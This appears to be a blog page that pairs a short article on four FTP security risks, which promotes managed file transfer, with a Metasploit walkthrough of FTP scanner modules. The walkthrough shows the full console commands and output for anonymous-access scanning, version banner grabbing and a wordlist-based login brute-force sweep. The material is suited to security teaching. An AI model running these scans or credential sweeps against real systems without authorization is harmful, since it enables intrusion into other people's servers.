FTP Anonymous Login

 4 FTP Exploits Used by Hackers

Businesses depend on reliable and secure access to information in order to meet today’s fast-paced market demands. Relatedly, sharing data, both internally and externally, is crucial to any organization.

One of the oldest and still-often used methods of sharing data is file transfer protocol (FTP). While familiar to IT teams and business users alike, FTP lacks many of the crucial security, compliance, or workflow needs of today’s modern organization.

How does FTP put security of data at risk?

Here is a look at 4 different FTP exploits used by hackers:

1. Anonymous Authentication – Anonymous authentication is an FTP vulnerability that allows users to log in with a user name of FTP or anonymously. In many cases, users will provide their email address as the password. (Microsoft Docs) However, a user’s login credentials (username and password) and the commands used unencrypted, visible, and vulnerable to access. At the same time, any data sent through FTP or is hosted on an anonymous FTP server is also left unprotected. In 2017, the FBI discovered hackers actively targeting medical and dental facilities using FTP to gain access to protected health information (PHI).

2. Directory Traversal Attack – Another FTP vulnerability includes directory traversal attacks in which the successful attack overwrites or creates unauthorized files that are stored outside of the web root folder. In turn, the original FTP owner is then subject to the file or directory permissions and controls of the hacker. (Acunetix)

3. Cross-Site Scripting (XSS) – XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script to an end user. Flaws that allow attacks to succeed are quite widespread and can occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XXS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. (Open Web Application Security Project)

4. Dridex-based Malware Attack – First identified in 2014, after banks were targeted in the U.K., Dridex malware has been reinvented and reintroduced in an unexpected way. Dridex malware targeted Windows users that would open Word or Excel email attachments, which would then cause macros to download the malware and infect the computer, exposing the user to the banking theft. In the latest version of the Dridex malware, the hackers use FTP sites and credentials to avoid detection by email gateways and network policies that trust FTP. Regularly updating FTP credentials can help deter a Dridex-based exploit. (ZDNEt)

FTP servers alone lack the system capabilities that many organizations need to meet today’s business requirements. From security, productivity, and compliance, an FTP server by itself can’t scale to either cost or complexity. A managed file transfer (MFT) platform was designed to address all of the business needs described above, and more. In some cases, a MFT platform can work with FTP during a transition to a more secure and efficient flow of information.

MFT technology offers a higher level of control and security than FTP, often featuring:

  • In-depth reporting (like notification of completed file transfers)
  • Global visibility into all data transfer activity
  • End-to-end security with encryption of data in transit and at rest
  • Performance metrics, monitoring, support of regulatory compliance requirements
  • Workflow automation, and so much more

Scanner FTP Auxiliary Modules

anonymous

The ftp/anonymous scanner will scan a range of IP addresses searching for FTP servers that allow anonymous access and determines where read or write permissions are allowed.

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > show options

Module options:

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port
   THREADS  1                    yes       The number of concurrent threads

Configuring the module is a simple matter of setting the IP range we wish to scan along with the number of concurrent threads and let it run.

msf auxiliary(anonymous) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(anonymous) > set THREADS 55
THREADS => 55
msf auxiliary(anonymous) > run

[*] 192.168.1.222:21 Anonymous READ (220 mailman FTP server (Version wu-2.6.2-5) ready.)
[*] 192.168.1.205:21 Anonymous READ (220 oracle2 Microsoft FTP Service (Version 5.0).)
[*] 192.168.1.215:21 Anonymous READ (220 (vsFTPd 1.1.3))
[*] 192.168.1.203:21 Anonymous READ/WRITE (220 Microsoft FTP Service)
[*] 192.168.1.227:21 Anonymous READ (220 srv2 Microsoft FTP Service (Version 5.0).)
[*] 192.168.1.204:21 Anonymous READ/WRITE (220 Microsoft FTP Service)
[*] Scanned 27 of 55 hosts (049% complete)
[*] Scanned 51 of 55 hosts (092% complete)
[*] Scanned 52 of 55 hosts (094% complete)
[*] Scanned 53 of 55 hosts (096% complete)
[*] Scanned 54 of 55 hosts (098% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >

ftp_login

The ftp_login auxiliary module will scan a range of IP addresses attempting to log in to FTP servers.

msf > use auxiliary/scanner/ftp/ftp_login 
msf auxiliary(ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

   Name              Current Setting                     Required  Description
   ----              ---------------                     --------  -----------
   BLANK_PASSWORDS   false                               no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                   yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                               no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                               no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                               no        Add all users in the current database to the list
   PASSWORD                                              no        A specific password to authenticate with
   PASS_FILE         /usr/share/wordlists/fasttrack.txt  no        File containing passwords, one per line
   Proxies                                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST      false                               no        Record anonymous/guest logins to the database
   RHOSTS                                                yes       The target address range or CIDR identifier
   RPORT             21                                  yes       The target port (TCP)
   STOP_ON_SUCCESS   false                               yes       Stop guessing when a credential works for a host
   THREADS           1                                   yes       The number of concurrent threads
   USERNAME                                              no        A specific username to authenticate as
   USERPASS_FILE                                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                               no        Try the username as the password for all users
   USER_FILE                                             no        File containing usernames, one per line
   VERBOSE           true                                yes       Whether to print output for all attempts

This module can take both wordlists and user-specified credentials in order to attempt to login.

msf auxiliary(ftp_login) > set RHOSTS 192.168.69.50-254
RHOSTS => 192.168.69.50-254
msf auxiliary(ftp_login) > set THREADS 205
THREADS => 205
msf auxiliary(ftp_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf auxiliary(ftp_login) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf auxiliary(ftp_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(ftp_login) > run

[*] 192.168.69.51:21 - Starting FTP login sweep
[*] 192.168.69.50:21 - Starting FTP login sweep
[*] 192.168.69.52:21 - Starting FTP login sweep
...snip...
[*] Scanned 082 of 205 hosts (040% complete)
[*] 192.168.69.135:21 - FTP Banner: '220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.69.135]\x0d\x0a'
[*] Scanned 204 of 205 hosts (099% complete)
[+] 192.168.69.135:21 - Successful FTP login for 'msfadmin':'msfadmin'
[*] 192.168.69.135:21 - User 'msfadmin' has READ/WRITE access
[*] Scanned 205 of 205 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_login) >

As we can see, the scanner successfully logged in to one of our targets with the provided credentials.

ftp_version

The ftp_version module simply scans a range of IP addresses and determines the version of any FTP servers that are running.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > show options

Module options:

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port
   THREADS  1                    yes       The number of concurrent threads

To setup the module, we just set our RHOSTS and THREADS values and let it run.

msf auxiliary(ftp_version) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(ftp_version) > set THREADS 55
THREADS => 55
msf auxiliary(ftp_version) > run

[*] 192.168.1.205:21 FTP Banner: '220 oracle2 Microsoft FTP Service (Version 5.0).\x0d\x0a'
[*] 192.168.1.204:21 FTP Banner: '220 Microsoft FTP Service\x0d\x0a'
[*] 192.168.1.203:21 FTP Banner: '220 Microsoft FTP Service\x0d\x0a'
[*] 192.168.1.206:21 FTP Banner: '220 oracle2 Microsoft FTP Service (Version 5.0).\x0d\x0a'
[*] 192.168.1.216:21 FTP Banner: '220 (vsFTPd 2.0.1)\x0d\x0a'
[*] 192.168.1.211:21 FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[*] 192.168.1.215:21 FTP Banner: '220 (vsFTPd 1.1.3)\x0d\x0a'
[*] 192.168.1.222:21 FTP Banner: '220 mailman FTP server (Version wu-2.6.2-5) ready.\x0d\x0a'
[*] 192.168.1.227:21 FTP Banner: '220 srv2 Microsoft FTP Service (Version 5.0).\x0d\x0a'
[*] 192.168.1.249:21 FTP Banner: '220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.249]\x0d\x0a'
[*] Scanned 28 of 55 hosts (050% complete)
[*] 192.168.1.217:21 FTP Banner: '220 ftp3 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.\x0d\x0a'
[*] Scanned 51 of 55 hosts (092% complete)
[*] Scanned 52 of 55 hosts (094% complete)
[*] Scanned 53 of 55 hosts (096% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.